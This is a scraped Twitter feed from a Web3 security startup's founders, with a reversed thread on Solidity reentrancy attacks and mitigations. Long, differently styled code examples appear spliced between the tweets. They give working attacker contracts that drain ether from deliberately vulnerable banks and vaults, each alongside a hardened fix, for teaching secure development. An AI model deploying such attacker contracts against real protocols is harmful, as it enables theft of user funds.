📢 Collaboration announcement: Inconfido 🤝 Dapper Labs
We are thrilled to reveal that we are working with , through their developer grant, to build security tooling to help protect end users from scams and phishing.
Youssef’s Tweets
Quote Tweet
Our founders @danny_inconfido , @jared_inconfido and @youss_inconfido will be attending @Zebu_live London #Web3 & #Crypto Conference on September 22nd-23rd 2022! If you’re around please come and find us to get to know what we are about and how we’re embedding security into Web3
📣The team is super excited to announce a community partnership with to promote #security in Web3 across the UK.
Internet vs. Web - People interchange these two terms, but they’re fundamentally different.
I’ve got a post coming out soon on behalf of covering Web2 vs. Web3, the evolution of Web3, and combatting terms like ‘crypto’ and ‘blockchain’
Builders just want to build a good product for their users. Often not caring as much about security framework guarantees. Web2 didn’t, Web3 should.
are here to help and guide builders and end users. Let’s make security transparent, flexible, and human readable!
The importance of threat modeling can't be ignored. There's a decent amount of resources out there for Web2 but no repository of known threat models, attack steps, and associated controls yet for Web3. It's something we're also building (opensource OFC)
Whether it's security architecture support, threat modeling, or secure developer training, we can help you out with that. , and my aim is to support building a secure Web3, and it starts with the builders. DM us for more info. #security
Amazing write-up of from , , , on how security considerations differ across the development life cycle. We at can support any project with threat modeling and helping you design your smart contracts securely.
Quote Tweet
In web3: security is not only of utmost importance, but also cannot be over-simplified to a checkbox for audit.
To help, @ajbeal, @nassyweazy, @cseifert, and I put together the following guide for thinking about smart contract security at every step
a16zcrypto.com/smart-contract
Great thread on integer under/overflows by my fellow co-founder . One of our goals at is to improve security knowledge within the space. Keep a lookout for similar threads from the team discussing the top threats in Web3 and how you can avoid them.
Quote Tweet
As promised, here's a
covering integer under/overflows. Essentially a vulnerability introduced as part of insecure handling of unsigned integers in Solidity. To support our community please re-tweet and comment what you think!
The current state of security in Web3 is reminiscent of the early 2000s.
Right now, the focus is getting something built as quickly as possible, and we’re starting to see the consequences of that.
Web3 needs more standardized security standards and frameworks, similar to NIST, OWASP, etc. They provide consistency to development practices and a set of best practice controls for each stage of the development lifecycle.
Projects that build securely will do better than projects that rely solely on audits as a stamp of “security”.
Bridges are the next big attack vector. We’re already starting to see it with Wormhole, Ronin, etc. They are a massive area of concentration and point of failure. Which also means they are a huge target. Keep building securely.
Quote Tweet
Gm fam!
I think that attacks on cross-chain bridges will become mainstream in the near future. Hackers from North Korea are already looking at them, soon others will follow…
Save this cheatsheet & remember my post above:
Graph.org/Cross-chain-br
Following on from amazing thread on re-entrancy attacks, I'm preparing one of my own on integer over/underflows.
Let me know what else you want to learn about! The more we can educate about security, the better.
Sources I’ve used to compile this research include:
medium.com/coinmonks/prot
arxiv.org/pdf/1812.05934
docs.soliditylang.org/en/v0.8.13/sec
docs.openzeppelin.com/contracts/4.x/ (21/21)
Our team at aims to enhance security in the #web3security space for both end users and the #web3 builders. We have a strong focus on security education with planned future product releases and consultancy services. (20/21)
Security Auditing: Although getting your contract security audited does not always guarantee all vulnerabilities will be detected, it is a good way to spot most reentrancy vulnerabilities pre-contract deployment. (19/21)
Reentrancy Mitigation Libraries: A good way to prevent same-function and cross-function reentrancy is to use, for example, 's reentrancy guard library which applies a lock to function execution until contract state is updated. (18/21)
Code Scanning: Many Solidity smart contract open-source security code scanners exist that can detect reentrancy vulnerabilities. Code scanning should form part of your development lifecycle. Examples of security code scanning tools are Mythril and Manticore. (17/21)
Standard send and transfer functions limit the amount of gas so a malicious contract may have less scope for executing complex functions and thus re-entering. (16/21)
Another development practice to look out for is the use of send, transfer and call functions which have different constraints on gas limits... (15/21)
Secure Solidity Development Practices: A security pattern has already been developed for reentrancy attacks within Solidity documentation. The Checks Effects Interactions Security Pattern is the primary pattern that can be used to disrupt the way reentrancy attacks work. (14/21)
There are a number of security controls that can be used to mitigate these vulnerabilities within smart contracts and these include... (13/21)
The creation of a new contract will cause its constructor to execute and this could be an external call to a malicious smart contract which could then re-enter the original contract and abuse the fact that a variable was not updated by executing another relevant function. (12/21)
For this attack to work, the victim smart contract must be creating a new smart contract as part of its function execution before making an update to a state variable. (11/21)
Create-based reentrancy: This type of reentrancy vulnerability may be less common due to its nature but it still poses a real risk to smart contracts. (10/21)
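The create-based case in tweets 10/21 to 12/21 above, as an added example (not code from the thread, Inconfido, or any real project; every contract, interface and function name here is made up for illustration): a factory deploys a per-user vault whose constructor notifies its owner, and because the factory records the new vault only after the CREATE, that notification lets a contract owner re-enter createVault() and pass the "one vault per address" check again.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical owner hook; a contract owner receives this callback from
// the vault's constructor.
interface IVaultOwner {
    function onVaultCreated(address vault) external;
}

// Each user gets one personal vault. If the owner is a contract, the
// constructor's notification is an external call into attacker-controlled code.
contract PersonalVault {
    address public immutable owner;

    constructor(address _owner) {
        owner = _owner;
        if (_owner.code.length > 0) {
            IVaultOwner(_owner).onVaultCreated(address(this));
        }
    }
}

// Vulnerable: the CREATE (and the constructor it runs) happens before the
// factory writes vaultOf[msg.sender], so the check at the top still passes
// for a re-entrant call made from inside the constructor.
contract VaultFactory {
    mapping(address => address) public vaultOf;
    mapping(address => uint256) public signupBonus; // meant to be paid once
    uint256 public vaultCount;

    function createVault() external {
        require(vaultOf[msg.sender] == address(0), "already has a vault"); // check
        PersonalVault v = new PersonalVault(msg.sender);  // interaction (constructor runs here)
        vaultOf[msg.sender] = address(v);                  // effect, too late
        signupBonus[msg.sender] += 1 ether;
        vaultCount++;
    }
}

// Attacker: the constructor callback re-enters the factory a few times;
// each pass sees vaultOf == address(0) and credits another bonus.
contract CreateReentrancyAttacker is IVaultOwner {
    VaultFactory public immutable factory;
    uint256 public depth;

    constructor(VaultFactory _factory) { factory = _factory; }

    function attack() external { factory.createVault(); }

    function onVaultCreated(address) external override {
        require(msg.sender != address(0));
        if (depth < 3) {          // depth cap so the demo does not run out of gas
            depth++;
            factory.createVault(); // re-enter while the effect is still pending
        }
    }
}

// Hardened: record the effect before the CREATE. The re-entrant call now
// fails the hasVault check; the vault address is stored once it is known.
contract SafeVaultFactory {
    mapping(address => bool) public hasVault;
    mapping(address => address) public vaultOf;
    mapping(address => uint256) public signupBonus;
    uint256 public vaultCount;

    function createVault() external {
        require(!hasVault[msg.sender], "already has a vault"); // check
        hasVault[msg.sender] = true;                           // effects first
        signupBonus[msg.sender] += 1 ether;
        vaultCount++;
        vaultOf[msg.sender] = address(new PersonalVault(msg.sender)); // interaction
    }
}
```

Against VaultFactory, one call to attack() ends with signupBonus[attacker] == 4 ether and vaultCount == 4; against SafeVaultFactory the nested createVault() reverts, which reverts the constructor and the whole outer call, so the attacker gets nothing. The general rule is the one the thread gives: a `new` expression is an external interaction, so every state update it should be guarded by goes before it.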
...invokes the code within that library using a DELEGATECALL instruction. The library smart contract can then be used by a malicious contract to re-enter into the victim contract. (9/21)
Delegated reentrancy: Reentrancy attacks do not even have to span one contract. Delegated reentrancy (aka Cross-contract reentrancy) occurs when a smart contract uses another smart contract as a library and... (8/21)
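The delegated (library) case in tweets 8/21 and 9/21 above, as an added example (not code from the thread, Inconfido, or any real library; PayoutLib, DelegatingVault and the other names are invented for illustration). In Solidity, a library's external functions are invoked with DELEGATECALL, so the library's code runs against the vault's storage and can be handed a storage pointer to its mapping. The vault's withdraw() then looks harmless in isolation, one library call followed by a state update, but the external call that hands control to the attacker lives inside the library.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// External library functions run via DELEGATECALL in the caller's storage
// context; `balances` below is the calling vault's own mapping.
library PayoutLib {
    function payOut(mapping(address => uint256) storage balances, address to) external {
        uint256 amount = balances[to];
        require(amount > 0, "nothing to pay");
        // External call made from library code: `to` regains control while
        // the vault's balances are still unchanged.
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "send failed");
    }
}

// Vulnerable: the DELEGATECALL into PayoutLib is the interaction, and it
// happens before the vault zeroes the balance.
contract DelegatingVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        PayoutLib.payOut(balances, msg.sender); // DELEGATECALL, re-enterable
        balances[msg.sender] = 0;               // effect after the interaction
    }
}

// Attacker: the callback from the library's send re-enters the vault, whose
// storage still shows the original credit.
contract DelegatedReentrancyAttacker {
    DelegatingVault public immutable vault;
    uint256 public reentries;

    constructor(DelegatingVault _vault) { vault = _vault; }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        // msg.value here equals our original deposit; keep going while the
        // vault can still pay it and a depth cap is not reached.
        if (address(vault).balance >= msg.value && reentries < 5) {
            reentries++;
            vault.withdraw();
        }
    }
}

// Hardened: treat the library call as the interaction it is. The vault
// zeroes the balance first and passes the amount explicitly.
library SafePayoutLib {
    function payOut(address to, uint256 amount) external {
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "send failed");
    }
}

contract SafeDelegatingVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];    // checks
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;                 // effects
        SafePayoutLib.payOut(msg.sender, amount); // interaction (DELEGATECALL)
    }
}
```

Because the library functions are external, the libraries must be deployed and linked into the vault bytecode (Hardhat, Foundry and Remix all do this for you). The review lesson is that any DELEGATECALL target, whether a Solidity library, a proxy implementation or a third-party helper, has to be read as part of the calling function when deciding whether Checks-Effects-Interactions holds.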
In this case, the attacking contract reenters using a different function that relies on the same variables that haven’t yet been updated by the initial function. (7/21)
Cross-function reentrancy: Reentrancy attacks do not have to span one function within a smart contract, cross-function reentrancy occurs when multiple functions within one contract read from or write to the same internal variables. (6/21)
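The cross-function case from tweets 6/21 and 7/21 above, together with the reentrancy-guard mitigation from tweet 18/21, as an added example (not code from the thread or Inconfido; SharedBalanceVulnerable, CrossFunctionAttacker and the accomplice address are invented for illustration, and the import path assumes OpenZeppelin Contracts 4.x installed via npm or forge). withdrawAll() is the only function that sends ether, but transferTo() reads the same balances mapping, so the attacker's receive() uses it to move the not-yet-zeroed credit to a second address while the payout is in flight.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// OpenZeppelin Contracts 4.x path (assumed installed).
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

// Vulnerable: withdrawAll() calls out before zeroing the balance, and
// transferTo() shares that balance. Nothing stops the callback from
// spending the still-credited amount through transferTo().
contract SharedBalanceVulnerable {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function transferTo(address to, uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance");
        balances[msg.sender] -= amount;
        balances[to] += amount;
    }

    function withdrawAll() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction...
        require(ok, "send failed");
        balances[msg.sender] = 0;                          // ...then effect
    }
}

// Attacker: is paid by withdrawAll(), and during that payout moves the
// same credit to an accomplice, who can withdraw it again later.
contract CrossFunctionAttacker {
    SharedBalanceVulnerable public immutable bank;
    address public immutable accomplice;
    bool private reentered;

    constructor(SharedBalanceVulnerable _bank, address _accomplice) {
        bank = _bank;
        accomplice = _accomplice;
    }

    function attack() external payable {
        bank.deposit{value: msg.value}();
        bank.withdrawAll(); // pays msg.value back to this contract
    }

    receive() external payable {
        if (!reentered) {
            reentered = true;
            // Our balance has not been zeroed yet: hand it to the accomplice.
            bank.transferTo(accomplice, bank.balances(address(this)));
        }
    }
}

// Hardened: one contract-wide lock (OpenZeppelin ReentrancyGuard) on every
// function that touches balances, plus Checks-Effects-Interactions. A
// transferTo() made from inside withdrawAll()'s callback now reverts.
contract SharedBalanceGuarded is ReentrancyGuard {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function transferTo(address to, uint256 amount) external nonReentrant {
        require(balances[msg.sender] >= amount, "insufficient balance");
        balances[msg.sender] -= amount;
        balances[to] += amount;
    }

    function withdrawAll() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;                          // effect first
        (bool ok, ) = msg.sender.call{value: amount}(""); // then interaction
        require(ok, "send failed");
    }
}
```

After attack{value: 1 ether}() against SharedBalanceVulnerable, the attacker holds the 1 ether and balances[accomplice] == 1 ether, so the accomplice can drain a second ether that belongs to other depositors. Against SharedBalanceGuarded the nested transferTo() hits the lock and reverts, which makes the send fail and the outer withdrawAll() revert. The point of the guard is that it is shared across functions; a lock that only protected withdrawAll() would not stop this attack.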
An example of this is the infamous “TheDAO” attack by which an attacker was able to steal 3.6 million ETH using this type of vulnerability. (5/21)
There are multiple types of reentrancy vulnerabilities and those include:
Same-function reentrancy: One of the most common reentrancy vulnerabilities, this occurs when the whole attack spans one function within the victim’s smart contract. (4/21)
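The same-function case described in tweets 2/21 to 4/21 above, beside the Checks-Effects-Interactions fix from tweet 14/21, as an added example (not code from the thread, Inconfido, or any real project; VulnerableBank, SafeBank and Attacker are invented for illustration). The only difference between the two banks is the order of the balance update and the external call.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Vulnerable: the external call (interaction) happens before the balance is
// zeroed (effect), so the recipient's receive() can call withdraw() again
// and pass the same balance check with the same, unchanged balance.
contract VulnerableBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        // `call` forwards all remaining gas, so the recipient can do real work.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
        balances[msg.sender] = 0; // effect after the interaction: too late
    }
}

// Attacker: deposits 1 ether, withdraws, and re-enters withdraw() from
// receive() while its 1 ether credit is still on the books.
contract Attacker {
    VulnerableBank public immutable bank;
    uint256 public reentries;

    constructor(VulnerableBank _bank) { bank = _bank; }

    function attack() external payable {
        require(msg.value == 1 ether, "send exactly 1 ether");
        bank.deposit{value: 1 ether}();
        bank.withdraw();
    }

    receive() external payable {
        // Keep re-entering while the bank can still pay 1 ether; the depth
        // cap stops the demo before the call stack runs out of gas.
        if (address(bank).balance >= 1 ether && reentries < 10) {
            reentries++;
            bank.withdraw();
        }
    }
}

// Hardened: Checks-Effects-Interactions. The balance is zeroed before the
// external call, so a re-entrant withdraw() fails the `amount > 0` check.
contract SafeBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];            // checks
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;                          // effects
        (bool ok, ) = msg.sender.call{value: amount}(""); // interactions
        require(ok, "send failed");
    }
}
```

To see it run: deploy VulnerableBank, have an honest account deposit a few ether, then call Attacker.attack{value: 1 ether}() and compare address(bank).balance before and after; repeat against SafeBank and the re-entrant call reverts, which also reverts the attacker's outer withdraw(). On the gas point from tweets 15/21 and 16/21: swapping `call` for `transfer` in VulnerableBank forwards only the 2300 gas stipend, which is not enough for the receive() above to re-enter, but the stipend is a property of opcode pricing rather than of the contract's logic, so the ordering fix in SafeBank is the control to rely on.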
This provides possible paths for malicious smart contracts to manipulate function execution by taking advantage of inconsistent variables to re-execute the same or different functions that make use of inconsistent variables. All of this happens within one transaction. (3/21)
Reentrancy is one of the most well-known vulnerabilities in EVM-based smart contracts, yet still frequently missed by developers. At a basic level, #reentrancy occurs when a smart contract allows for the execution of external calls before updating state variables. (2/21)
As we’ve seen from the latest attack on Fei Protocol’s Rari Fuse pools, reentrancy vulnerabilities in EVM-based smart contracts are still being widely exploited. Here’s a thread all about reentrancy vulnerabilities & what developers should be doing to protect against them: (1/21)
We also want to know what else you want to hear about! To help spread the awareness, get to the top of our upcoming threads and re-tweet so we can keep educating about security! #security #web3community #smartcontractsecurity
Interesting thread on some common attack vectors / threats within DeFi. There is still plenty more, both basic and advanced. However, one of the biggest threats is people. The security culture in Web3 is very immature still; we as a community need to do more.
Quote Tweet
0/ Many successful heists in DeFi and Web3 have nothing to do with bugs in the code.
If you want to be safe, you need to understand all the ways in which a protocol can be attacked.
Here are 9 attack patterns in DeFi that everyone should know
To be fair Omniscia highlighted the Checks Effects Interactions security pattern, which is a way to mitigate reentrancy attacks. On the other hand, reentrancy should have been explicitly mentioned as a possible threat vector. Also, dev security training is key factor here.
Great short thread on how Forta monitored the suspicious events. Threat and Vulnerability Management is key for security regardless of Web2 or Web3. Great work . Hope to see future collaboration between you and in the near future!
Quote Tweet
Forta real-time alerts could have prevented the $10 million @saddlefinance hack.
Several early high confidence signals alerted on the attack 